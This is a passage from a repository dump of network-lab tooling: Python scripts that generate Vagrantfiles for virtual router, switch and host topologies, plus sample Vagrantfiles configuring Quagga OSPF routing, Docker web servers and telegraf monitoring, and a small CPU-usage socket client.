\"Os\": \"bento/ubuntu-16.04\",\n \"Network\" : [{\n \"Ip\": \"172.16.3.5/28\",\n \"Netmask\": \"255.255.255.240\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"172.16.4.9/30\",\n \"Netmask\": \"255.255.255.252\",\n \"Interface\" : \"eth2\"\n }]\n})\nrout2 = (5,{\n \"Id\" : 5,\n \"Name\":\"router2\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"Network\" : [{\n \"Ip\": \"172.16.2.10/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"172.16.4.10/30\",\n \"Netmask\": \"255.255.255.252\",\n \"Interface\" : \"eth2\"\n }]\n})\nswitch1 = (6,{\n \"Id\" : 6,\n \"Name\":\"switch1\",\n \"Type\": \"Switch\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"Network\" : [{\n \"Ip\": \"172.16.8.10/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"HA\"\n },{\n \"Ip\": \"172.16.12.10/22\",\n \"Netmask\": \"255.255.252.0\",\n \"Interface\" : \"HB\"\n },{\n \"Ip\": \"172.16.3.2/28\",\n \"Netmask\": \"255.255.255.240\",\n \"Interface\" : \"SW1\"\n }]\n})\n\nfakeNet = [host1,host2,host3,rout1,rout2,switch1]\n\ndef main():\n VagrantFile = open(\"VagrantfileSWITCH\", \"w\")\n\n #read the data structure from input\n #Network = G.nodes.data():\n Network = fakeNet\n\n #first, let's write the beginnig of the VagrantFile\n BeginVagrantFile(VagrantFile,Network)\n\n\n #second, let's write each device with his feature\n #this topology has 3 hosts, 1 switch and 3 routers\n for device in Network:\n #call the respective function to \"populate\" the vagrant file\n typeOfDevice = device[1][\"Type\"]\n print(\"the device is a \" + typeOfDevice)\n\n if typeOfDevice is \"Router\":\n writeRouter(VagrantFile,device,Network)\n\n for device in Network:\n #call the respective function to \"populate\" the vagrant file\n typeOfDevice = device[1][\"Type\"]\n print(\"the device is a \" + typeOfDevice)\n if typeOfDevice is \"Switch\":\n writeSwitch(VagrantFile,device,Network)\n\n\n for device in Network:\n #call the respective function to \"populate\" the vagrant file\n typeOfDevice = device[1][\"Type\"]\n print(\"the device is a \" + typeOfDevice)\n if typeOfDevice is \"Host\":\n writeHost(VagrantFile,device,Network)\n\n VagrantFile.write(\"end\\n\")\n VagrantFile.close()\n\nmain()\n"
},
{
"alpha_fraction": 0.6978299617767334,
"alphanum_fraction": 0.7596560716629028,
"avg_line_length": 34.39613342285156,
"blob_id": "a79f36f61e358d363190de62039edc01e6a11007",
"content_id": "7bcc380be452e8e9f5052ffea269e4ab8e86b2a8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 7327,
"license_type": "permissive",
"max_line_length": 151,
"num_lines": 207,
"path": "/AllVagrantFiles/Ospf_Routing/Vagrantfile",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "# -*- mode: ruby -*- \n# vi: set ft=ruby :\n\n#All Vagrant configuration is done below. The 2 in Vagrant.configure\n#configures the configuration version we support older styles for\n#backwards compatibility. Please don't change it unless you know what\n#you're doing.\nVagrant.configure(\"2\") do |config|\nconfig.vm.box_check_update = true\nconfig.vm.provider \"virtualbox\" do |vb|\nvb.customize [\"modifyvm\", :id, \"--usb\", \"on\"]\nvb.customize [\"modifyvm\", :id, \"--usbehci\", \"off\"]\nvb.customize [\"modifyvm\", :id, \"--nicpromisc2\", \"allow-all\"]\nvb.customize [\"modifyvm\", :id, \"--nicpromisc3\", \"allow-all\"]\nvb.customize [\"modifyvm\", :id, \"--nicpromisc4\", \"allow-all\"]\nvb.customize [\"modifyvm\", :id, \"--nicpromisc5\", \"allow-all\"]\nvb.cpus = 1\nend\nconfig.vm.define \"routerjack\" do |routerjack|\nrouterjack.vm.box = \"bento/ubuntu-16.04\"\nrouterjack.vm.hostname = \"routerjack\"\nrouterjack.vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: false\nrouterjack.vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-inter-2\", auto_config: false\nrouterjack.vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-inter-1\", auto_config: false\nrouterjack.vm.provision \"shell\", inline: <<-SHELL\necho \" Quagga routerjack start installing\"\n#sudo sysctl -w net.ipv4.ip_forward=1\nsudo apt-get update\nsudo apt-get install quagga quagga-doc traceroute\nsudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\nsudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\nsudo chown quagga.quaggavty /etc/quagga/*.conf\nsudo /etc/init.d/quagga start\nsudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\nsudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\nsudo echo 'VTYSH_PAGER=more' >>/etc/environment\nsudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\nsudo /etc/init.d/quagga restart\necho \"Routing Protocol ospf Configuration Started\"\nsudo vtysh -c '\nconfigure terminal\nrouter ospf\nnetwork 192.168.1.0/24 area 0.0.0.0\nnetwork 192.168.100.0/24 area 0.0.0.0\nnetwork 192.168.101.0/24 area 0.0.0.0\nexit\ninterface eth1\nip address 192.168.1.254/24\nexit\ninterface eth2\nip address 192.168.100.1/24\nexit\ninterface eth3\nip address 192.168.101.2/24\ndo write\nexit\nexit\nip forwarding\nexit'\necho \"Configuration END\"\necho \"routerjack is ready to Use\"\nSHELL\n# routerjack.vm.provision \"shell\", path: \"common.sh\"\nrouterjack.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nend\nend\nconfig.vm.define \"routersteve\" do |routersteve|\nroutersteve.vm.box = \"bento/ubuntu-16.04\"\nroutersteve.vm.hostname = \"routersteve\"\nroutersteve.vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-south-3\", auto_config: false\nroutersteve.vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-inter-3\", auto_config: false\nroutersteve.vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-inter-2\", auto_config: false\nroutersteve.vm.provision \"shell\", inline: <<-SHELL\necho \" Quagga routersteve start installing\"\n#sudo sysctl -w net.ipv4.ip_forward=1\nsudo apt-get update\nsudo apt-get install quagga quagga-doc traceroute\nsudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\nsudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\nsudo chown quagga.quaggavty /etc/quagga/*.conf\nsudo /etc/init.d/quagga start\nsudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\nsudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\nsudo echo 'VTYSH_PAGER=more' >>/etc/environment\nsudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\nsudo /etc/init.d/quagga restart\necho \"Routing Protocol ospf Configuration Started\"\nsudo vtysh -c '\nconfigure terminal\nrouter ospf\nnetwork 192.168.2.0/24 area 0.0.0.0\nnetwork 192.168.100.0/24 area 0.0.0.0\nnetwork 192.168.102.0/24 area 0.0.0.0\nexit\ninterface eth1\nip address 192.168.2.254/24\nexit\ninterface eth2\nip address 192.168.100.2/24\nexit\ninterface eth3\nip address 192.168.102.2/24\ndo write\nexit\nexit\nip forwarding\nexit'\necho \"Configuration END\"\necho \"routersteve is ready to Use\"\nSHELL\n# routersteve.vm.provision \"shell\", path: \"common.sh\"\nroutersteve.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nend\nend\nconfig.vm.define \"ruoterjhon\" do |ruoterjhon|\nruoterjhon.vm.box = \"bento/ubuntu-16.04\"\nruoterjhon.vm.hostname = \"ruoterjhon\"\nruoterjhon.vm.provision \"shell\", inline: <<-SHELL\necho \" Quagga ruoterjhon start installing\"\n#sudo sysctl -w net.ipv4.ip_forward=1\nsudo apt-get update\nsudo apt-get install quagga quagga-doc traceroute\nsudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\nsudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\nsudo chown quagga.quaggavty /etc/quagga/*.conf\nsudo /etc/init.d/quagga start\nsudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\nsudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\nsudo echo 'VTYSH_PAGER=more' >>/etc/environment\nsudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\nsudo /etc/init.d/quagga restart\necho \"Routing Protocol ospf Configuration Started\"\nsudo vtysh -c '\nconfigure terminal\nrouter ospf\nnetwork 192.168.3.0/24 area 0.0.0.0\nnetwork 192.168.101.0/24 area 0.0.0.0\nnetwork 192.168.102.0/24 area 0.0.0.0\nexit\ninterface eth1\nip address 192.168.3.254/24\nexit\ninterface eth2\nip address 192.168.101.1/24\nexit\ninterface eth3\nip address 192.168.102.1/24\ndo write\nexit\nexit\nip forwarding\nexit'\necho \"Configuration END\"\necho \"ruoterjhon is ready to Use\"\nSHELL\n# ruoterjhon.vm.provision \"shell\", path: \"common.sh\"\nruoterjhon.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nend\nend\nconfig.vm.define \"hostbanana\" do |hostbanana|\nhostbanana.vm.box = \"bento/ubuntu-16.04\"\nhostbanana.vm.hostname = \"hostbanana\"\nhostbanana.vm.network \"private_network\", ip: \"192.168.1.1\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: true\nhostbanana.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\necho \"Static Routig configuration Started for hostbanana\"\nsudo sysctl -w net.ipv4.ip_forward=1\nsudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.254 dev eth1\necho \"Configuration END\"\necho \"hostbanana is ready to Use\"\nSHELL\nhostbanana.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nend\nend\nconfig.vm.define \"hostmela\" do |hostmela|\nhostmela.vm.box = \"bento/ubuntu-16.04\"\nhostmela.vm.hostname = \"hostmela\"\nhostmela.vm.network \"private_network\", ip: \"192.168.2.1\", netmask: \"255.255.255.0\", virtualbox__intnet: \"broadcast_router-south-3\", auto_config: true\nhostmela.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\necho \"Static Routig configuration Started for hostmela\"\nsudo sysctl -w net.ipv4.ip_forward=1\nsudo route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.254 dev eth1\necho \"Configuration END\"\necho \"hostmela is ready to Use\"\nSHELL\nhostmela.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nend\nend\nconfig.vm.define \"hostpera\" do |hostpera|\nhostpera.vm.box = \"bento/ubuntu-16.04\"\nhostpera.vm.hostname = \"hostpera\"\nhostpera.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\necho \"Static Routig configuration Started for hostpera\"\nsudo sysctl -w net.ipv4.ip_forward=1\nsudo route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.254 dev eth1\necho \"Configuration END\"\necho \"hostpera is ready to Use\"\nSHELL\nhostpera.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nend\nend\nend\n"
},
{
"alpha_fraction": 0.6499176025390625,
"alphanum_fraction": 0.6771004796028137,
"avg_line_length": 24.808509826660156,
"blob_id": "3cc49d4da01aaa59a84fbfd1e7aef3a51528964b",
"content_id": "6010b70eb2926b4a0559ea67c17ebd1ae3fe09e6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1214,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 47,
"path": "/Server and Client/client.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import socket\n\nimport psutil #this import was added by luca\nimport time\n\nHEADER = 64\nPORT = 5050\nFORMAT = 'utf-8'\nDISCONNECT_MESSAGE = \"!DISCONNECT\"\n#SERVER = \"192.168.53.133\"\nSERVER = \"127.0.1.1\" #Luca: \"i added this line to make it work on my pc, commenting the one above\"\nADDR = (SERVER, PORT)\n\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient.connect(ADDR)\n\ndef send(msg):\n message = msg.encode(FORMAT)\n msg_length = len(message)\n send_length = str(msg_length).encode(FORMAT)\n send_length += b' ' * (HEADER - len(send_length))\n client.send(send_length)\n client.send(message)\n print(client.recv(2048).decode(FORMAT))\n\n#this function return the percentage of RAM in use by the machine\ndef Ram_data_perc():\n return (int(psutil.virtual_memory().available * 100 / psutil.virtual_memory().total))\n\n#this function return the percentage of CPU in use by the machine\ndef Cpu_data_perc():\n return (int(psutil.cpu_percent())) \n\n\ntry:\n while(1):\n #send(str(Ram_data_perc()))\n send(str(Cpu_data_perc()))\n time.sleep(1)\nexcept:\n send(DISCONNECT_MESSAGE)\n\n#send(str(Ram_data_perc()))\n#input()\n#send(str(Cpu_data_perc()))\n#input()\n#send(\"Hello uzair!\")\n\n"
},
{
"alpha_fraction": 0.6069246530532837,
"alphanum_fraction": 0.6252545714378357,
"avg_line_length": 31.733333587646484,
"blob_id": "6cc880420e46ed49621c6cbabe1daffad4aec8d2",
"content_id": "4f7697fb79c0188652a61f6e720a52f20a14564a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 491,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 15,
"path": "/fromHTMLtoVagrant/OldScripts/vagrantDB.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import urllib3\nfrom bs4 import BeautifulSoup\n\ndef retrieve_versionsOS(os):\n url = 'https://app.vagrantup.com/' + os\n req = urllib3.PoolManager()\n res = req.request('GET', url)\n soup = BeautifulSoup(res.data, 'html.parser')\n boxes = soup.findAll('div', {'class': 'col-md-6'})\n versions = []\n for box in boxes:\n version = box.text.split()[0]\n description = box.text.rsplit('\\n', 3)[2][12:]\n versions.append((version, description))\n return versions\n"
},
{
"alpha_fraction": 0.5988142490386963,
"alphanum_fraction": 0.6324110627174377,
"avg_line_length": 25.63157844543457,
"blob_id": "5e47cd299de8e7c57ae74b9090463256c31dc7b7",
"content_id": "f37b7dab1ed207cbc67bb767f5d7fc0fce7cf3d4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 506,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 19,
"path": "/AllVagrantFiles/Web_Server_With_Docker_and_Port_Forwarding/Vagrantfile",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "## to access webserver try this in your webbrowser : (http://localhost:8081/) you will see the webpage.\n\n## or you can configure one by yourself\n\n\n\n # -*- mode: ruby -*-\n# vi: set ft=ruby :\n \n Vagrant.configure(\"2\") do |config|\n config.vm.box = \"ubuntu/xenial64\"\n config.vm.network \"forwarded_port\", guest: 80, host: 8081\n config.vm.provision \"docker\" do |doc|\n\t doc.pull_images \"nginx\"\n doc.pull_images \"mysql\"\n\t\t doc.run \"mysql\"\n\t\t doc.run \"nginx\", args: \"-p 80:80\"\n end\n end\n"
},
{
"alpha_fraction": 0.5871710777282715,
"alphanum_fraction": 0.6146746873855591,
"avg_line_length": 44.21900939941406,
"blob_id": "cc84e9a16b062ec92e552a659b6aaf9c6eb7c5d8",
"content_id": "74b578b581fd2e2c16ca3637bb460e0696331af5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21888,
"license_type": "permissive",
"max_line_length": 191,
"num_lines": 484,
"path": "/fromHTMLtoVagrant/VagrantTopology3S2H.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import ipcalc \nimport yaml\n\n#this function writes the beginning of the VagrantFile\ndef BeginVagrantFile(f):\n f.write('Vagrant.configure(\"2\") do |config|\\n')\n f.write('config.vm.box_check_update = true\\n')\n f.write('config.vm.provider \"virtualbox\" do |vb|\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--usb\", \"on\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--usbehci\", \"off\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc2\", \"allow-all\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc3\", \"allow-all\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc4\", \"allow-all\"]\\n')\n f.write('vb.customize [\"modifyvm\", :id, \"--nicpromisc5\", \"allow-all\"]\\n')\n f.write('vb.cpus = 1\\n')\n f.write('end\\n')\n\n#this function writes a server in vagrant file\ndef writeServer(f, Server, edges, network):\n \n Id = Server[\"id\"]\n Name = Server[\"label\"]\n Os = Server[\"vm_image\"]\n Ram = Server[\"ram\"]\n N_Cpus = Server[\"n_cpus\"]\n CustomScript = Server[\"custom_script\"]\n\n\n Ip1 = Server[\"network_interfaces\"][0][\"ip_address\"]\n Netmask1 = Server[\"network_interfaces\"][0][\"netmask\"]\n Interface1 = Server[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference1 = Server[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth1 = 0\n DownlinkBandwidth1 = 0\n for edge in edges:\n if EdgeReference1[0] == edge[\"from\"] and EdgeReference1[1] == edge[\"to\"]:\n UplinkBandwidth1 = edge[\"bandwidth_up\"]\n DownlinkBandwidth1 = edge[\"bandwidth_down\"]\n IpNoSub1 = Ip1.split(\"/\")[0]\n NetmaskAbbr1 = Ip1.split(\"/\")[1]\n\n if(Id != 6):\n Ip2 = Server[\"network_interfaces\"][1][\"ip_address\"]\n Netmask2 = Server[\"network_interfaces\"][1][\"netmask\"]\n Interface2 = Server[\"network_interfaces\"][1][\"name_interface\"]\n EdgeReference2 = Server[\"network_interfaces\"][1][\"edge\"]\n UplinkBandwidth2 = 0\n DownlinkBandwidth2 = 0\n for edge in edges:\n if EdgeReference2[0] == edge[\"from\"] and EdgeReference2[1] == edge[\"to\"]:\n UplinkBandwidth2 = edge[\"bandwidth_up\"]\n DownlinkBandwidth2 = edge[\"bandwidth_down\"]\n IpNoSub2 = Ip2.split(\"/\")[0]\n NetmaskAbbr2 = Ip2.split(\"/\")[1]\n\n\n if Id == 1: \n tag = \"1\"\n if Id == 2 or Id == 6: \n tag = \"2\" \n\n\n IpServer2 = network[1][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskServer2 = network[1][\"network_interfaces\"][0][\"netmask\"]\n NetworkServer2 = ipcalc.Network(IpServer2)\n IpNetServer2 = str(NetworkServer2.network())\n \"\"\"\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n \"\"\"\n\n IpServer1_1 = network[0][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskServer1_1 = network[0][\"network_interfaces\"][0][\"netmask\"]\n NetworkServer1_1 = ipcalc.Network(IpServer1_1)\n IpNetServer1_1 = str(NetworkServer1_1.network()) \n \"\"\"\n Ip3 = Topology[5][1][\"Network\"][2][\"Ip\"]\n Mask3 = Topology[5][1][\"Network\"][2][\"Netmask\"]\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = str(Network3.network())\n \"\"\"\n\n IpServer1_2 = network[0][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskServer1_2 = network[0][\"network_interfaces\"][1][\"netmask\"]\n NetworkServer1_2 = ipcalc.Network(IpServer1_2)\n IpNetServer1_2 = str(NetworkServer1_2.network()) \n \"\"\"\n Ip8 = Topology[5][1][\"Network\"][0][\"Ip\"]\n Mask8 = Topology[5][1][\"Network\"][0][\"Netmask\"]\n Network8 = ipcalc.Network(Ip8)\n IpNet8 = str(Network8.network())\n \"\"\"\n\n IpSwitch_1 = network[2][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskSwitch_1 = network[2][\"network_interfaces\"][0][\"netmask\"]\n NetworkSwitch_1 = ipcalc.Network(IpSwitch_1)\n IpNetSwitch_1 = str(NetworkSwitch_1.network()) \n \"\"\"\n Ip12 = Topology[5][1][\"Network\"][1][\"Ip\"]\n Mask12 = Topology[5][1][\"Network\"][1][\"Netmask\"]\n Network12 = ipcalc.Network(Ip12)\n IpNet12 = str(Network12.network())\n \"\"\"\n\n IpSwitch_2 = network[2][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskSwitch_2 = network[2][\"network_interfaces\"][1][\"netmask\"]\n NetworkSwitch_2 = ipcalc.Network(IpSwitch_2)\n IpNetSwitch_2 = str(NetworkSwitch_2.network()) \n\n GatewayServer2_2 = network[1][\"network_interfaces\"][1][\"ip_address\"]\n GatewayServer2_2 = GatewayServer2_2.split(\"/\")[0]\n \n GatewayServer1_2 = network[0][\"network_interfaces\"][1][\"ip_address\"]\n GatewayServer1_2 = GatewayServer1_2.split(\"/\")[0]\n\n GatewaySwitch_2 = network[2][\"network_interfaces\"][1][\"ip_address\"]\n GatewaySwitch_2 = GatewaySwitch_2.split(\"/\")[0]\n\n GatewaySwitch_3 = network[2][\"network_interfaces\"][2][\"ip_address\"]\n GatewaySwitch_3 = GatewaySwitch_3.split(\"/\")[0]\n\n \n f.write(\"config.vm.define \\\"\" + Name+ \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os + \"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub1 + \"\\\", netmask: \\\"\" + Netmask1 + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-\" + tag + \"\\\", auto_config: true\\n\")\n if Id != 6:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub2 + \"\\\", netmask: \\\"\" + Netmask2 + \"\\\", virtualbox__intnet: \\\"broadcast_router-inter\\\", auto_config: true\\n\")\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n\n if Id == 1: \n f.write(\"sudo route add -net \" + IpNetServer2 + \" netmask \" + NetmaskServer2 + \" gw \" + GatewayServer2_2 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + GatewaySwitch_3 + \" dev \" + Interface1 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + GatewaySwitch_3 + \" dev \" + Interface1 + \"\\n\")\n if Id == 2: \n f.write(\"sudo route add -net \" + IpNetServer1_1 + \" netmask \" + NetmaskServer1_1 + \" gw \" + GatewayServer1_2 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + GatewayServer1_2 + \" dev \" + Interface2 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + GatewayServer1_2 + \" dev \" + Interface2 + \"\\n\")\n if Id == 6:\n f.write(\"sudo route add -net \" + IpNetServer2 + \" netmask \" + NetmaskServer2 + \" gw \" + GatewaySwitch_2 + \" dev \" + Interface1 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetServer1_1 + \" netmask \" + NetmaskServer1_1 + \" gw \" + GatewaySwitch_2 + \" dev \" + Interface1 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetServer1_2 + \" netmask \" + NetmaskServer1_2 + \" gw \" + GatewaySwitch_2 + \" dev \" + Interface1 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + GatewaySwitch_2 + \" dev \" + Interface1 + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + GatewaySwitch_2 + \" dev \" + Interface1 + \"\\n\")\n\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth1 > 0 or DownlinkBandwidth1 > 0:\n f.write('sudo ./wondershaper -a ' + Interface1)\n if DownlinkBandwidth1 > 0:\n f.write(' -d ' + str(DownlinkBandwidth1))\n if UplinkBandwidth1 > 0:\n f.write(' -u ' + str(UplinkBandwidth1))\n f.write('\\n')\n\n if(Id != 6):\n if UplinkBandwidth2 > 0 or DownlinkBandwidth2 > 0:\n f.write('sudo ./wondershaper -a ' + Interface2)\n if DownlinkBandwidth2 > 0:\n f.write(' -d ' + str(DownlinkBandwidth2))\n if UplinkBandwidth2 > 0:\n f.write(' -u ' + str(UplinkBandwidth2))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n f.write(CustomScript + \" \\n\") #here there is the custum script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + str(Ram) + \"\\n\")\n f.write(\"vb.cpus = \" + str(N_Cpus) + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n\n#this function write in the vagrant file a new PC host\ndef writeHost(f, Host, edges, network):\n\n Id = Host[\"id\"]\n Name = Host[\"label\"]\n Os = Host[\"vm_image\"]\n Ram = Host[\"ram\"]\n N_Cpus = Host[\"n_cpus\"]\n CustomScript = Host[\"custom_script\"]\n Ip = Host[\"network_interfaces\"][0][\"ip_address\"]\n Netmask = Host[\"network_interfaces\"][0][\"netmask\"]\n Interface = Host[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Host[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n IpNoSub = Ip.split(\"/\")[0]\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n\n IpServer2 = network[1][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskServer2 = network[1][\"network_interfaces\"][0][\"netmask\"]\n NetworkServer2 = ipcalc.Network(IpServer2)\n IpNetServer2 = str(NetworkServer2.network())\n \"\"\"\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n \"\"\"\n\n IpServer1_1 = network[0][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskServer1_1 = network[0][\"network_interfaces\"][0][\"netmask\"]\n NetworkServer1_1 = ipcalc.Network(IpServer1_1)\n IpNetServer1_1 = str(NetworkServer1_1.network()) \n \"\"\"\n Ip3 = Topology[5][1][\"Network\"][2][\"Ip\"]\n Mask3 = Topology[5][1][\"Network\"][2][\"Netmask\"]\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = str(Network3.network())\n \"\"\"\n\n IpServer1_2 = network[0][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskServer1_2 = network[0][\"network_interfaces\"][1][\"netmask\"]\n NetworkServer1_2 = ipcalc.Network(IpServer1_2)\n IpNetServer1_2 = str(NetworkServer1_2.network()) \n \"\"\"\n Ip8 = Topology[5][1][\"Network\"][0][\"Ip\"]\n Mask8 = Topology[5][1][\"Network\"][0][\"Netmask\"]\n Network8 = ipcalc.Network(Ip8)\n IpNet8 = str(Network8.network())\n \"\"\"\n\n IpSwitch_1 = network[2][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskSwitch_1 = network[2][\"network_interfaces\"][0][\"netmask\"]\n NetworkSwitch_1 = ipcalc.Network(IpSwitch_1)\n IpNetSwitch_1 = str(NetworkSwitch_1.network()) \n \"\"\"\n Ip12 = Topology[5][1][\"Network\"][1][\"Ip\"]\n Mask12 = Topology[5][1][\"Network\"][1][\"Netmask\"]\n Network12 = ipcalc.Network(Ip12)\n IpNet12 = str(Network12.network())\n \"\"\"\n\n IpSwitch_2 = network[2][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskSwitch_2 = network[2][\"network_interfaces\"][1][\"netmask\"]\n NetworkSwitch_2 = ipcalc.Network(IpSwitch_2)\n IpNetSwitch_2 = str(NetworkSwitch_2.network())\n\n if Id == 4:\n Gateway = IpSwitch_1.split(\"/\")[0]\n\n if Id == 5:\n Gateway = IpSwitch_2.split(\"/\")[0]\n\n\n 